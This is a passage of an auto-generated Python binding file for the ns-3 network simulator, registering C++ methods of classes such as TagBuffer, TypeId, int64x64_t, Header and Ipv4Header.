## tag-buffer.h (module 'network'): void ns3::TagBuffer::CopyFrom(ns3::TagBuffer o) [member function]
cls.add_method('CopyFrom',
'void',
[param('ns3::TagBuffer', 'o')])
## tag-buffer.h (module 'network'): void ns3::TagBuffer::Read(uint8_t * buffer, uint32_t size) [member function]
cls.add_method('Read',
'void',
[param('uint8_t *', 'buffer'), param('uint32_t', 'size')])
## tag-buffer.h (module 'network'): double ns3::TagBuffer::ReadDouble() [member function]
cls.add_method('ReadDouble',
'double',
[])
## tag-buffer.h (module 'network'): uint16_t ns3::TagBuffer::ReadU16() [member function]
cls.add_method('ReadU16',
'uint16_t',
[])
## tag-buffer.h (module 'network'): uint32_t ns3::TagBuffer::ReadU32() [member function]
cls.add_method('ReadU32',
'uint32_t',
[])
## tag-buffer.h (module 'network'): uint64_t ns3::TagBuffer::ReadU64() [member function]
cls.add_method('ReadU64',
'uint64_t',
[])
## tag-buffer.h (module 'network'): uint8_t ns3::TagBuffer::ReadU8() [member function]
cls.add_method('ReadU8',
'uint8_t',
[])
## tag-buffer.h (module 'network'): void ns3::TagBuffer::TrimAtEnd(uint32_t trim) [member function]
cls.add_method('TrimAtEnd',
'void',
[param('uint32_t', 'trim')])
## tag-buffer.h (module 'network'): void ns3::TagBuffer::Write(uint8_t const * buffer, uint32_t size) [member function]
cls.add_method('Write',
'void',
[param('uint8_t const *', 'buffer'), param('uint32_t', 'size')])
## tag-buffer.h (module 'network'): void ns3::TagBuffer::WriteDouble(double v) [member function]
cls.add_method('WriteDouble',
'void',
[param('double', 'v')])
## tag-buffer.h (module 'network'): void ns3::TagBuffer::WriteU16(uint16_t data) [member function]
cls.add_method('WriteU16',
'void',
[param('uint16_t', 'data')])
## tag-buffer.h (module 'network'): void ns3::TagBuffer::WriteU32(uint32_t data) [member function]
cls.add_method('WriteU32',
'void',
[param('uint32_t', 'data')])
## tag-buffer.h (module 'network'): void ns3::TagBuffer::WriteU64(uint64_t v) [member function]
cls.add_method('WriteU64',
'void',
[param('uint64_t', 'v')])
## tag-buffer.h (module 'network'): void ns3::TagBuffer::WriteU8(uint8_t v) [member function]
cls.add_method('WriteU8',
'void',
[param('uint8_t', 'v')])
return
def register_Ns3TypeId_methods(root_module, cls):
cls.add_binary_comparison_operator('<')
cls.add_binary_comparison_operator('!=')
cls.add_output_stream_operator()
cls.add_binary_comparison_operator('==')
## type-id.h (module 'core'): ns3::TypeId::TypeId(char const * name) [constructor]
cls.add_constructor([param('char const *', 'name')])
## type-id.h (module 'core'): ns3::TypeId::TypeId() [constructor]
cls.add_constructor([])
## type-id.h (module 'core'): ns3::TypeId::TypeId(ns3::TypeId const & o) [copy constructor]
cls.add_constructor([param('ns3::TypeId const &', 'o')])
## type-id.h (module 'core'): ns3::TypeId ns3::TypeId::AddAttribute(std::string name, std::string help, ns3::AttributeValue const & initialValue, ns3::Ptr<ns3::AttributeAccessor const> accessor, ns3::Ptr<ns3::AttributeChecker const> checker) [member function]
cls.add_method('AddAttribute',
'ns3::TypeId',
[param('std::string', 'name'), param('std::string', 'help'), param('ns3::AttributeValue const &', 'initialValue'), param('ns3::Ptr< ns3::AttributeAccessor const >', 'accessor'), param('ns3::Ptr< ns3::AttributeChecker const >', 'checker')])
## type-id.h (module 'core'): ns3::TypeId ns3::TypeId::AddAttribute(std::string name, std::string help, uint32_t flags, ns3::AttributeValue const & initialValue, ns3::Ptr<ns3::AttributeAccessor const> accessor, ns3::Ptr<ns3::AttributeChecker const> checker) [member function]
cls.add_method('AddAttribute',
'ns3::TypeId',
[param('std::string', 'name'), param('std::string', 'help'), param('uint32_t', 'flags'), param('ns3::AttributeValue const &', 'initialValue'), param('ns3::Ptr< ns3::AttributeAccessor const >', 'accessor'), param('ns3::Ptr< ns3::AttributeChecker const >', 'checker')])
## type-id.h (module 'core'): ns3::TypeId ns3::TypeId::AddTraceSource(std::string name, std::string help, ns3::Ptr<ns3::TraceSourceAccessor const> accessor) [member function]
cls.add_method('AddTraceSource',
'ns3::TypeId',
[param('std::string', 'name'), param('std::string', 'help'), param('ns3::Ptr< ns3::TraceSourceAccessor const >', 'accessor')])
## type-id.h (module 'core'): ns3::TypeId::AttributeInformation ns3::TypeId::GetAttribute(uint32_t i) const [member function]
cls.add_method('GetAttribute',
'ns3::TypeId::AttributeInformation',
[param('uint32_t', 'i')],
is_const=True)
## type-id.h (module 'core'): std::string ns3::TypeId::GetAttributeFullName(uint32_t i) const [member function]
cls.add_method('GetAttributeFullName',
'std::string',
[param('uint32_t', 'i')],
is_const=True)
## type-id.h (module 'core'): uint32_t ns3::TypeId::GetAttributeN() const [member function]
cls.add_method('GetAttributeN',
'uint32_t',
[],
is_const=True)
## type-id.h (module 'core'): ns3::Callback<ns3::ObjectBase*,ns3::empty,ns3::empty,ns3::empty,ns3::empty,ns3::empty,ns3::empty,ns3::empty,ns3::empty,ns3::empty> ns3::TypeId::GetConstructor() const [member function]
cls.add_method('GetConstructor',
'ns3::Callback< ns3::ObjectBase *, ns3::empty, ns3::empty, ns3::empty, ns3::empty, ns3::empty, ns3::empty, ns3::empty, ns3::empty, ns3::empty >',
[],
is_const=True)
## type-id.h (module 'core'): std::string ns3::TypeId::GetGroupName() const [member function]
cls.add_method('GetGroupName',
'std::string',
[],
is_const=True)
## type-id.h (module 'core'): std::string ns3::TypeId::GetName() const [member function]
cls.add_method('GetName',
'std::string',
[],
is_const=True)
## type-id.h (module 'core'): ns3::TypeId ns3::TypeId::GetParent() const [member function]
cls.add_method('GetParent',
'ns3::TypeId',
[],
is_const=True)
## type-id.h (module 'core'): static ns3::TypeId ns3::TypeId::GetRegistered(uint32_t i) [member function]
cls.add_method('GetRegistered',
'ns3::TypeId',
[param('uint32_t', 'i')],
is_static=True)
## type-id.h (module 'core'): static uint32_t ns3::TypeId::GetRegisteredN() [member function]
cls.add_method('GetRegisteredN',
'uint32_t',
[],
is_static=True)
## type-id.h (module 'core'): ns3::TypeId::TraceSourceInformation ns3::TypeId::GetTraceSource(uint32_t i) const [member function]
cls.add_method('GetTraceSource',
'ns3::TypeId::TraceSourceInformation',
[param('uint32_t', 'i')],
is_const=True)
## type-id.h (module 'core'): uint32_t ns3::TypeId::GetTraceSourceN() const [member function]
cls.add_method('GetTraceSourceN',
'uint32_t',
[],
is_const=True)
## type-id.h (module 'core'): uint16_t ns3::TypeId::GetUid() const [member function]
cls.add_method('GetUid',
'uint16_t',
[],
is_const=True)
## type-id.h (module 'core'): bool ns3::TypeId::HasConstructor() const [member function]
cls.add_method('HasConstructor',
'bool',
[],
is_const=True)
## type-id.h (module 'core'): bool ns3::TypeId::HasParent() const [member function]
cls.add_method('HasParent',
'bool',
[],
is_const=True)
## type-id.h (module 'core'): ns3::TypeId ns3::TypeId::HideFromDocumentation() [member function]
cls.add_method('HideFromDocumentation',
'ns3::TypeId',
[])
## type-id.h (module 'core'): bool ns3::TypeId::IsChildOf(ns3::TypeId other) const [member function]
cls.add_method('IsChildOf',
'bool',
[param('ns3::TypeId', 'other')],
is_const=True)
## type-id.h (module 'core'): bool ns3::TypeId::LookupAttributeByName(std::string name, ns3::TypeId::AttributeInformation * info) const [member function]
cls.add_method('LookupAttributeByName',
'bool',
[param('std::string', 'name'), param('ns3::TypeId::AttributeInformation *', 'info')],
is_const=True)
## type-id.h (module 'core'): static ns3::TypeId ns3::TypeId::LookupByName(std::string name) [member function]
cls.add_method('LookupByName',
'ns3::TypeId',
[param('std::string', 'name')],
is_static=True)
## type-id.h (module 'core'): ns3::Ptr<ns3::TraceSourceAccessor const> ns3::TypeId::LookupTraceSourceByName(std::string name) const [member function]
cls.add_method('LookupTraceSourceByName',
'ns3::Ptr< ns3::TraceSourceAccessor const >',
[param('std::string', 'name')],
is_const=True)
## type-id.h (module 'core'): bool ns3::TypeId::MustHideFromDocumentation() const [member function]
cls.add_method('MustHideFromDocumentation',
'bool',
[],
is_const=True)
## type-id.h (module 'core'): bool ns3::TypeId::SetAttributeInitialValue(uint32_t i, ns3::Ptr<ns3::AttributeValue const> initialValue) [member function]
cls.add_method('SetAttributeInitialValue',
'bool',
[param('uint32_t', 'i'), param('ns3::Ptr< ns3::AttributeValue const >', 'initialValue')])
## type-id.h (module 'core'): ns3::TypeId ns3::TypeId::SetGroupName(std::string groupName) [member function]
cls.add_method('SetGroupName',
'ns3::TypeId',
[param('std::string', 'groupName')])
## type-id.h (module 'core'): ns3::TypeId ns3::TypeId::SetParent(ns3::TypeId tid) [member function]
cls.add_method('SetParent',
'ns3::TypeId',
[param('ns3::TypeId', 'tid')])
## type-id.h (module 'core'): void ns3::TypeId::SetUid(uint16_t tid) [member function]
cls.add_method('SetUid',
'void',
[param('uint16_t', 'tid')])
return
def register_Ns3TypeIdAttributeInformation_methods(root_module, cls):
## type-id.h (module 'core'): ns3::TypeId::AttributeInformation::AttributeInformation() [constructor]
cls.add_constructor([])
## type-id.h (module 'core'): ns3::TypeId::AttributeInformation::AttributeInformation(ns3::TypeId::AttributeInformation const & arg0) [copy constructor]
cls.add_constructor([param('ns3::TypeId::AttributeInformation const &', 'arg0')])
## type-id.h (module 'core'): ns3::TypeId::AttributeInformation::accessor [variable]
cls.add_instance_attribute('accessor', 'ns3::Ptr< ns3::AttributeAccessor const >', is_const=False)
## type-id.h (module 'core'): ns3::TypeId::AttributeInformation::checker [variable]
cls.add_instance_attribute('checker', 'ns3::Ptr< ns3::AttributeChecker const >', is_const=False)
## type-id.h (module 'core'): ns3::TypeId::AttributeInformation::flags [variable]
cls.add_instance_attribute('flags', 'uint32_t', is_const=False)
## type-id.h (module 'core'): ns3::TypeId::AttributeInformation::help [variable]
cls.add_instance_attribute('help', 'std::string', is_const=False)
## type-id.h (module 'core'): ns3::TypeId::AttributeInformation::initialValue [variable]
cls.add_instance_attribute('initialValue', 'ns3::Ptr< ns3::AttributeValue const >', is_const=False)
## type-id.h (module 'core'): ns3::TypeId::AttributeInformation::name [variable]
cls.add_instance_attribute('name', 'std::string', is_const=False)
## type-id.h (module 'core'): ns3::TypeId::AttributeInformation::originalInitialValue [variable]
cls.add_instance_attribute('originalInitialValue', 'ns3::Ptr< ns3::AttributeValue const >', is_const=False)
return
def register_Ns3TypeIdTraceSourceInformation_methods(root_module, cls):
## type-id.h (module 'core'): ns3::TypeId::TraceSourceInformation::TraceSourceInformation() [constructor]
cls.add_constructor([])
## type-id.h (module 'core'): ns3::TypeId::TraceSourceInformation::TraceSourceInformation(ns3::TypeId::TraceSourceInformation const & arg0) [copy constructor]
cls.add_constructor([param('ns3::TypeId::TraceSourceInformation const &', 'arg0')])
## type-id.h (module 'core'): ns3::TypeId::TraceSourceInformation::accessor [variable]
cls.add_instance_attribute('accessor', 'ns3::Ptr< ns3::TraceSourceAccessor const >', is_const=False)
## type-id.h (module 'core'): ns3::TypeId::TraceSourceInformation::help [variable]
cls.add_instance_attribute('help', 'std::string', is_const=False)
## type-id.h (module 'core'): ns3::TypeId::TraceSourceInformation::name [variable]
cls.add_instance_attribute('name', 'std::string', is_const=False)
return
def register_Ns3Empty_methods(root_module, cls):
## empty.h (module 'core'): ns3::empty::empty() [constructor]
cls.add_constructor([])
## empty.h (module 'core'): ns3::empty::empty(ns3::empty const & arg0) [copy constructor]
cls.add_constructor([param('ns3::empty const &', 'arg0')])
return
def register_Ns3Int64x64_t_methods(root_module, cls):
cls.add_binary_numeric_operator('*', root_module['ns3::int64x64_t'], root_module['ns3::int64x64_t'], param('long long unsigned int const', 'right'))
cls.add_binary_numeric_operator('*', root_module['ns3::int64x64_t'], root_module['ns3::int64x64_t'], param('long unsigned int const', 'right'))
cls.add_binary_numeric_operator('*', root_module['ns3::int64x64_t'], root_module['ns3::int64x64_t'], param('unsigned int const', 'right'))
cls.add_binary_numeric_operator('*', root_module['ns3::int64x64_t'], root_module['ns3::int64x64_t'], param('short unsigned int const', 'right'))
cls.add_binary_numeric_operator('*', root_module['ns3::int64x64_t'], root_module['ns3::int64x64_t'], param('unsigned char const', 'right'))
cls.add_binary_numeric_operator('*', root_module['ns3::int64x64_t'], root_module['ns3::int64x64_t'], param('long long int const', 'right'))
cls.add_binary_numeric_operator('*', root_module['ns3::int64x64_t'], root_module['ns3::int64x64_t'], param('long int const', 'right'))
cls.add_binary_numeric_operator('*', root_module['ns3::int64x64_t'], root_module['ns3::int64x64_t'], param('int const', 'right'))
cls.add_binary_numeric_operator('*', root_module['ns3::int64x64_t'], root_module['ns3::int64x64_t'], param('short int const', 'right'))
cls.add_binary_numeric_operator('*', root_module['ns3::int64x64_t'], root_module['ns3::int64x64_t'], param('signed char const', 'right'))
cls.add_binary_numeric_operator('*', root_module['ns3::int64x64_t'], root_module['ns3::int64x64_t'], param('double const', 'right'))
cls.add_binary_numeric_operator('*', root_module['ns3::int64x64_t'], root_module['ns3::int64x64_t'], param('ns3::int64x64_t const &', 'right'))
cls.add_binary_numeric_operator('+', root_module['ns3::int64x64_t'], root_module['ns3::int64x64_t'], param('long long unsigned int const', 'right'))
cls.add_binary_numeric_operator('+', root_module['ns3::int64x64_t'], root_module['ns3::int64x64_t'], param('long unsigned int const', 'right'))
cls.add_binary_numeric_operator('+', root_module['ns3::int64x64_t'], root_module['ns3::int64x64_t'], param('unsigned int const', 'right'))
cls.add_binary_numeric_operator('+', root_module['ns3::int64x64_t'], root_module['ns3::int64x64_t'], param('short unsigned int const', 'right'))
cls.add_binary_numeric_operator('+', root_module['ns3::int64x64_t'], root_module['ns3::int64x64_t'], param('unsigned char const', 'right'))
cls.add_binary_numeric_operator('+', root_module['ns3::int64x64_t'], root_module['ns3::int64x64_t'], param('long long int const', 'right'))
cls.add_binary_numeric_operator('+', root_module['ns3::int64x64_t'], root_module['ns3::int64x64_t'], param('long int const', 'right'))
cls.add_binary_numeric_operator('+', root_module['ns3::int64x64_t'], root_module['ns3::int64x64_t'], param('int const', 'right'))
cls.add_binary_numeric_operator('+', root_module['ns3::int64x64_t'], root_module['ns3::int64x64_t'], param('short int const', 'right'))
cls.add_binary_numeric_operator('+', root_module['ns3::int64x64_t'], root_module['ns3::int64x64_t'], param('signed char const', 'right'))
cls.add_binary_numeric_operator('+', root_module['ns3::int64x64_t'], root_module['ns3::int64x64_t'], param('double const', 'right'))
cls.add_binary_numeric_operator('+', root_module['ns3::int64x64_t'], root_module['ns3::int64x64_t'], param('ns3::int64x64_t const &', 'right'))
cls.add_binary_numeric_operator('-', root_module['ns3::int64x64_t'], root_module['ns3::int64x64_t'], param('long long unsigned int const', 'right'))
cls.add_binary_numeric_operator('-', root_module['ns3::int64x64_t'], root_module['ns3::int64x64_t'], param('long unsigned int const', 'right'))
cls.add_binary_numeric_operator('-', root_module['ns3::int64x64_t'], root_module['ns3::int64x64_t'], param('unsigned int const', 'right'))
cls.add_binary_numeric_operator('-', root_module['ns3::int64x64_t'], root_module['ns3::int64x64_t'], param('short unsigned int const', 'right'))
cls.add_binary_numeric_operator('-', root_module['ns3::int64x64_t'], root_module['ns3::int64x64_t'], param('unsigned char const', 'right'))
cls.add_binary_numeric_operator('-', root_module['ns3::int64x64_t'], root_module['ns3::int64x64_t'], param('long long int const', 'right'))
cls.add_binary_numeric_operator('-', root_module['ns3::int64x64_t'], root_module['ns3::int64x64_t'], param('long int const', 'right'))
cls.add_binary_numeric_operator('-', root_module['ns3::int64x64_t'], root_module['ns3::int64x64_t'], param('int const', 'right'))
cls.add_binary_numeric_operator('-', root_module['ns3::int64x64_t'], root_module['ns3::int64x64_t'], param('short int const', 'right'))
cls.add_binary_numeric_operator('-', root_module['ns3::int64x64_t'], root_module['ns3::int64x64_t'], param('signed char const', 'right'))
cls.add_binary_numeric_operator('-', root_module['ns3::int64x64_t'], root_module['ns3::int64x64_t'], param('double const', 'right'))
cls.add_unary_numeric_operator('-')
cls.add_binary_numeric_operator('-', root_module['ns3::int64x64_t'], root_module['ns3::int64x64_t'], param('ns3::int64x64_t const &', 'right'))
cls.add_binary_numeric_operator('/', root_module['ns3::int64x64_t'], root_module['ns3::int64x64_t'], param('long long unsigned int const', 'right'))
cls.add_binary_numeric_operator('/', root_module['ns3::int64x64_t'], root_module['ns3::int64x64_t'], param('long unsigned int const', 'right'))
cls.add_binary_numeric_operator('/', root_module['ns3::int64x64_t'], root_module['ns3::int64x64_t'], param('unsigned int const', 'right'))
cls.add_binary_numeric_operator('/', root_module['ns3::int64x64_t'], root_module['ns3::int64x64_t'], param('short unsigned int const', 'right'))
cls.add_binary_numeric_operator('/', root_module['ns3::int64x64_t'], root_module['ns3::int64x64_t'], param('unsigned char const', 'right'))
cls.add_binary_numeric_operator('/', root_module['ns3::int64x64_t'], root_module['ns3::int64x64_t'], param('long long int const', 'right'))
cls.add_binary_numeric_operator('/', root_module['ns3::int64x64_t'], root_module['ns3::int64x64_t'], param('long int const', 'right'))
cls.add_binary_numeric_operator('/', root_module['ns3::int64x64_t'], root_module['ns3::int64x64_t'], param('int const', 'right'))
cls.add_binary_numeric_operator('/', root_module['ns3::int64x64_t'], root_module['ns3::int64x64_t'], param('short int const', 'right'))
cls.add_binary_numeric_operator('/', root_module['ns3::int64x64_t'], root_module['ns3::int64x64_t'], param('signed char const', 'right'))
cls.add_binary_numeric_operator('/', root_module['ns3::int64x64_t'], root_module['ns3::int64x64_t'], param('double const', 'right'))
cls.add_binary_numeric_operator('/', root_module['ns3::int64x64_t'], root_module['ns3::int64x64_t'], param('ns3::int64x64_t const &', 'right'))
cls.add_binary_comparison_operator('<')
cls.add_binary_comparison_operator('>')
cls.add_binary_comparison_operator('!=')
cls.add_inplace_numeric_operator('*=', param('ns3::int64x64_t const &', 'right'))
cls.add_inplace_numeric_operator('+=', param('ns3::int64x64_t const &', 'right'))
cls.add_inplace_numeric_operator('-=', param('ns3::int64x64_t const &', 'right'))
cls.add_inplace_numeric_operator('/=', param('ns3::int64x64_t const &', 'right'))
cls.add_output_stream_operator()
cls.add_binary_comparison_operator('<=')
cls.add_binary_comparison_operator('==')
cls.add_binary_comparison_operator('>=')
## int64x64-double.h (module 'core'): ns3::int64x64_t::int64x64_t() [constructor]
cls.add_constructor([])
## int64x64-double.h (module 'core'): ns3::int64x64_t::int64x64_t(double v) [constructor]
cls.add_constructor([param('double', 'v')])
## int64x64-double.h (module 'core'): ns3::int64x64_t::int64x64_t(int v) [constructor]
cls.add_constructor([param('int', 'v')])
## int64x64-double.h (module 'core'): ns3::int64x64_t::int64x64_t(long int v) [constructor]
cls.add_constructor([param('long int', 'v')])
## int64x64-double.h (module 'core'): ns3::int64x64_t::int64x64_t(long long int v) [constructor]
cls.add_constructor([param('long long int', 'v')])
## int64x64-double.h (module 'core'): ns3::int64x64_t::int64x64_t(unsigned int v) [constructor]
cls.add_constructor([param('unsigned int', 'v')])
## int64x64-double.h (module 'core'): ns3::int64x64_t::int64x64_t(long unsigned int v) [constructor]
cls.add_constructor([param('long unsigned int', 'v')])
## int64x64-double.h (module 'core'): ns3::int64x64_t::int64x64_t(long long unsigned int v) [constructor]
cls.add_constructor([param('long long unsigned int', 'v')])
## int64x64-double.h (module 'core'): ns3::int64x64_t::int64x64_t(int64_t hi, uint64_t lo) [constructor]
cls.add_constructor([param('int64_t', 'hi'), param('uint64_t', 'lo')])
## int64x64-double.h (module 'core'): ns3::int64x64_t::int64x64_t(ns3::int64x64_t const & o) [copy constructor]
cls.add_constructor([param('ns3::int64x64_t const &', 'o')])
## int64x64-double.h (module 'core'): double ns3::int64x64_t::GetDouble() const [member function]
cls.add_method('GetDouble',
'double',
[],
is_const=True)
## int64x64-double.h (module 'core'): int64_t ns3::int64x64_t::GetHigh() const [member function]
cls.add_method('GetHigh',
'int64_t',
[],
is_const=True)
## int64x64-double.h (module 'core'): uint64_t ns3::int64x64_t::GetLow() const [member function]
cls.add_method('GetLow',
'uint64_t',
[],
is_const=True)
## int64x64-double.h (module 'core'): static ns3::int64x64_t ns3::int64x64_t::Invert(uint64_t v) [member function]
cls.add_method('Invert',
'ns3::int64x64_t',
[param('uint64_t', 'v')],
is_static=True)
## int64x64-double.h (module 'core'): void ns3::int64x64_t::MulByInvert(ns3::int64x64_t const & o) [member function]
cls.add_method('MulByInvert',
'void',
[param('ns3::int64x64_t const &', 'o')])
return
def register_Ns3Chunk_methods(root_module, cls):
## chunk.h (module 'network'): ns3::Chunk::Chunk() [constructor]
cls.add_constructor([])
## chunk.h (module 'network'): ns3::Chunk::Chunk(ns3::Chunk const & arg0) [copy constructor]
cls.add_constructor([param('ns3::Chunk const &', 'arg0')])
## chunk.h (module 'network'): uint32_t ns3::Chunk::Deserialize(ns3::Buffer::Iterator start) [member function]
cls.add_method('Deserialize',
'uint32_t',
[param('ns3::Buffer::Iterator', 'start')],
is_pure_virtual=True, is_virtual=True)
## chunk.h (module 'network'): static ns3::TypeId ns3::Chunk::GetTypeId() [member function]
cls.add_method('GetTypeId',
'ns3::TypeId',
[],
is_static=True)
## chunk.h (module 'network'): void ns3::Chunk::Print(std::ostream & os) const [member function]
cls.add_method('Print',
'void',
[param('std::ostream &', 'os')],
is_pure_virtual=True, is_const=True, is_virtual=True)
return
def register_Ns3Header_methods(root_module, cls):
cls.add_output_stream_operator()
## header.h (module 'network'): ns3::Header::Header() [constructor]
cls.add_constructor([])
## header.h (module 'network'): ns3::Header::Header(ns3::Header const & arg0) [copy constructor]
cls.add_constructor([param('ns3::Header const &', 'arg0')])
## header.h (module 'network'): uint32_t ns3::Header::Deserialize(ns3::Buffer::Iterator start) [member function]
cls.add_method('Deserialize',
'uint32_t',
[param('ns3::Buffer::Iterator', 'start')],
is_pure_virtual=True, is_virtual=True)
## header.h (module 'network'): uint32_t ns3::Header::GetSerializedSize() const [member function]
cls.add_method('GetSerializedSize',
'uint32_t',
[],
is_pure_virtual=True, is_const=True, is_virtual=True)
## header.h (module 'network'): static ns3::TypeId ns3::Header::GetTypeId() [member function]
cls.add_method('GetTypeId',
'ns3::TypeId',
[],
is_static=True)
## header.h (module 'network'): void ns3::Header::Print(std::ostream & os) const [member function]
cls.add_method('Print',
'void',
[param('std::ostream &', 'os')],
is_pure_virtual=True, is_const=True, is_virtual=True)
## header.h (module 'network'): void ns3::Header::Serialize(ns3::Buffer::Iterator start) const [member function]
cls.add_method('Serialize',
'void',
[param('ns3::Buffer::Iterator', 'start')],
is_pure_virtual=True, is_const=True, is_virtual=True)
return
def register_Ns3Ipv4Header_methods(root_module, cls):
## ipv4-header.h (module 'internet'): ns3::Ipv4Header::Ipv4Header(ns3::Ipv4Header const & arg0) [copy constructor]
cls.add_constructor([param('ns3::Ipv4Header const &', 'arg0')])
## ipv4-header.h (module 'internet'): ns3::Ipv4Header::Ipv4Header() [constructor]
cls.add_constructor([])
## ipv4-header.h (module 'internet'): uint32_t ns3::Ipv4Header::Deserialize(ns3::Buffer::Iterator start) [member function]
cls.add_method('Deserialize',
'uint32_t',
[param('ns3::Buffer::Iterator', 'start')],
is_virtual=True)
## ipv4-header.h (module 'internet'): std::string ns3::Ipv4Header::DscpTypeToString(ns3::Ipv4Header::DscpType dscp) const [member function]
cls.add_method('DscpTypeToString',
'std::string',
[param('ns3::Ipv4Header::DscpType', 'dscp')],
is_const=True)
## ipv4-header.h (module 'internet'): std::string ns3::Ipv4Header::EcnTypeToString(ns3::Ipv4Header::EcnType ecn) const [member function]
cls.add_method('EcnTypeToString',
'std::string',
[param('ns3::Ipv4Header::EcnType', 'ecn')],
is_const=True)
## ipv4-header.h (module 'internet'): void ns3::Ipv4Header::EnableChecksum() [member function]
cls.add_method('EnableChecksum',
'void',
[])
## ipv4-header.h (module 'internet'): ns3::Ipv4Address ns3::Ipv4Header::GetDestination() const [member function]
cls.add_method('GetDestination',
'ns3::Ipv4Address',
[],
is_const=True)
## ipv4-header.h (module 'internet'): ns3::Ipv4Header::DscpType ns3::Ipv4Header::GetDscp() const [member function]
cls.add_method('GetDscp',
'ns3::Ipv4Header::DscpType',
[],
is_const=True)
## ipv4-header.h (module 'internet'): ns3::Ipv4Header::EcnType ns3::Ipv4Header::GetEcn() const [member function]
cls.add_method('GetEcn',
'ns3::Ipv4Header::EcnType',
[],
is_const=True)
## ipv4-header.h (module 'internet'): uint16_t ns3::Ipv4Header::GetFragmentOffset() const [member function]
cls.add_method('GetFragmentOffset',
'uint16_t',
[],
is_const=True)
## ipv4-header.h (module 'internet'): uint16_t ns3::Ipv4Header::GetIdentification() const [member function]
cls.add_method('GetIdentification',
'uint16_t',
[],
is_const=True)
## ipv4-header.h (module 'internet'): ns3::TypeId ns3::Ipv4Header::GetInstanceTypeId() const [member function]
cls.add_method('GetInstanceTypeId',
'ns3::TypeId',
[],
is_const=True, is_virtual=True)
## ipv4-header.h (module 'internet'): uint16_t ns3::Ipv4Header::GetPayloadSize() const [member function]
cls.add_method('GetPayloadSize',
'uint16_t',
[],
is_const=True)
## ipv4-header.h (module 'internet'): uint8_t ns3::Ipv4Header::GetProtocol() const [member function]
cls.add_method('GetProtocol',
'uint8_t',
[],
is_const=True)
## ipv4-header.h (module 'internet'): uint32_t ns3::Ipv4Header::GetSerializedSize() const [member function]
cls.add_method('GetSerializedSize',
'uint32_t',
[],
is_const=True, is_virtual=True)
## ipv4-header.h (module 'internet'): ns3::Ipv4Address ns3::Ipv4Header::GetSource() const [member function]
cls.add_method('GetSource',
'ns3::Ipv4Address',
[],
is_const=True)
## ipv4-header.h (module 'internet'): uint8_t ns3::Ipv4Header::GetTos() const [member function]
cls.add_method('GetTos',
'uint8_t',
[],
is_const=True)
## ipv4-header.h (module 'internet'): uint8_t ns3::Ipv4Header::GetTtl() const [member function]
cls.add_method('GetTtl',
'uint8_t',
[],
is_const=True)
## ipv4-header.h (module 'internet'): static ns3::TypeId ns3::Ipv4Header::GetTypeId() [member function]
cls.add_method('GetTypeId',
'ns3::TypeId',
[],
is_static=True)
## ipv4-header.h (module 'internet'): bool ns3::Ipv4Header::IsChecksumOk() const [member function]
cls.add_method('IsChecksumOk',
'bool',
[],
is_const=True)
## ipv4-header.h (module 'internet'): bool ns3::Ipv4Header::IsDontFragment() const [member function]
cls.add_method('IsDontFragment',
'bool',
[],
is_const=True)
## ipv4-header.h (module 'internet'): bool ns3::Ipv4Header::IsLastFragment() const [member function]
cls.add_method('IsLastFragment',
'bool',
[],
is_const=True)
## ipv4-header.h (module 'internet'): void ns3::Ipv4Header::Print(std::ostream & os) const [member function]
cls.add_method('Print',
'void',
[param('std::ostream &', 'os')],
is_const=True, is_virtual=True)
## ipv4-header.h (module 'internet'): void ns3::Ipv4Header::Serialize(ns3::Buffer::Iterator start) const [member function]
cls.add_method('Serialize',
'void',
[param('ns3::Buffer::Iterator', 'start')],
is_const=True, is_virtual=True)
## ipv4-header.h (module 'internet'): void ns3::Ipv4Header::SetDestination(ns3::Ipv4Address destination) [member function]
cls.add_method('SetDestination',
'void',
[param('ns3::Ipv4Address', 'destination')])
## ipv4-header.h (module 'internet'): void ns3::Ipv4Header::SetDontFragment() [member function]
cls.add_method('SetDontFragment',
'void',
[])
## ipv4-header.h (module 'internet'): void ns3::Ipv4Header::SetDscp(ns3::Ipv4Header::DscpType dscp) [member function]
cls.add_method('SetDscp',
'void',
[param('ns3::Ipv4Header::DscpType', 'dscp')])
## ipv4-header.h (module 'internet'): void ns3::Ipv4Header::SetEcn(ns3::Ipv4Header::EcnType ecn) [member function]
cls.add_method('SetEcn',
'void',
[param('ns3::Ipv4Header::EcnType', 'ecn')])
## ipv4-header.h (module 'internet'): void ns3::Ipv4Header::SetFragmentOffset(uint16_t offsetBytes) [member function]
cls.add_method('SetFragmentOffset',
'void',
[param('uint16_t', 'offsetBytes')])
## ipv4-header.h (module 'internet'): void ns3::Ipv4Header::SetIdentification(uint16_t identification) [member function]
cls.add_method('SetIdentification',
'void',
[param('uint16_t', 'identification')])
## ipv4-header.h (module 'internet'): void ns3::Ipv4Header::SetLastFragment() [member function]
cls.add_method('SetLastFragment',
'void',
[])
## ipv4-header.h (module 'internet'): void ns3::Ipv4Header::SetMayFragment() [member function]
cls.add_method('SetMayFragment',
'void',
[])
## ipv4-header.h (module 'internet'): void ns3::Ipv4Header::SetMoreFragments() [member function]
cls.add_method('SetMoreFragments',
'void',
[])
## ipv4-header.h (module 'internet'): void ns3::Ipv4Header::SetPayloadSize(uint16_t size) [member function]
cls.add_method('SetPayloadSize',
'void',
[param('uint16_t', 'size')])
## ipv4-header.h (module 'internet'): void ns3::Ipv4Header::SetProtocol(uint8_t num) [member function]
cls.add_method('SetProtocol',
'void',
[param('uint8_t', 'num')])
## ipv4-header.h (module 'internet'): void ns3::Ipv4Header::SetSource(ns3::Ipv4Address source) [member function]
cls.add_method('SetSource',
'void',
[param('ns3::Ipv4Address', 'source')])
## ipv4-header.h (module 'internet'): void ns3::Ipv4Header::SetTos(uint8_t tos) [member function]
cls.add_method('SetTos',
'void',
[param('uint8_t', 'tos')])
## ipv4-header.h (module 'internet'): void ns3::Ipv4Header::SetTtl(uint8_t ttl) [member function]
cls.add_method('SetTtl',
'void',
[param('uint8_t', 'ttl')])
return
def register_Ns3Object_methods(root_module, cls):
## object.h (module 'core'): ns3::Object::Object() [constructor]
cls.add_constructor([])
## object.h (module 'core'): void ns3::Object::AggregateObject(ns3::Ptr<ns3::Object> other) [member function]
cls.add_method('AggregateObject',
'void',
[param('ns3::Ptr< ns3::Object >', 'other')])
## object.h (module 'core'): void ns3::Object::Dispose() [member function]
cls.add_method('Dispose',
'void',
[])
## object.h (module 'core'): ns3::Object::AggregateIterator ns3::Object::GetAggregateIterator() const [member function]
cls.add_method('GetAggregateIterator',
'ns3::Object::AggregateIterator',
[],
is_const=True)
## object.h (module 'core'): ns3::TypeId ns3::Object::GetInstanceTypeId() const [member function]
cls.add_method('GetInstanceTypeId',
'ns3::TypeId',
[],
is_const=True, is_virtual=True)
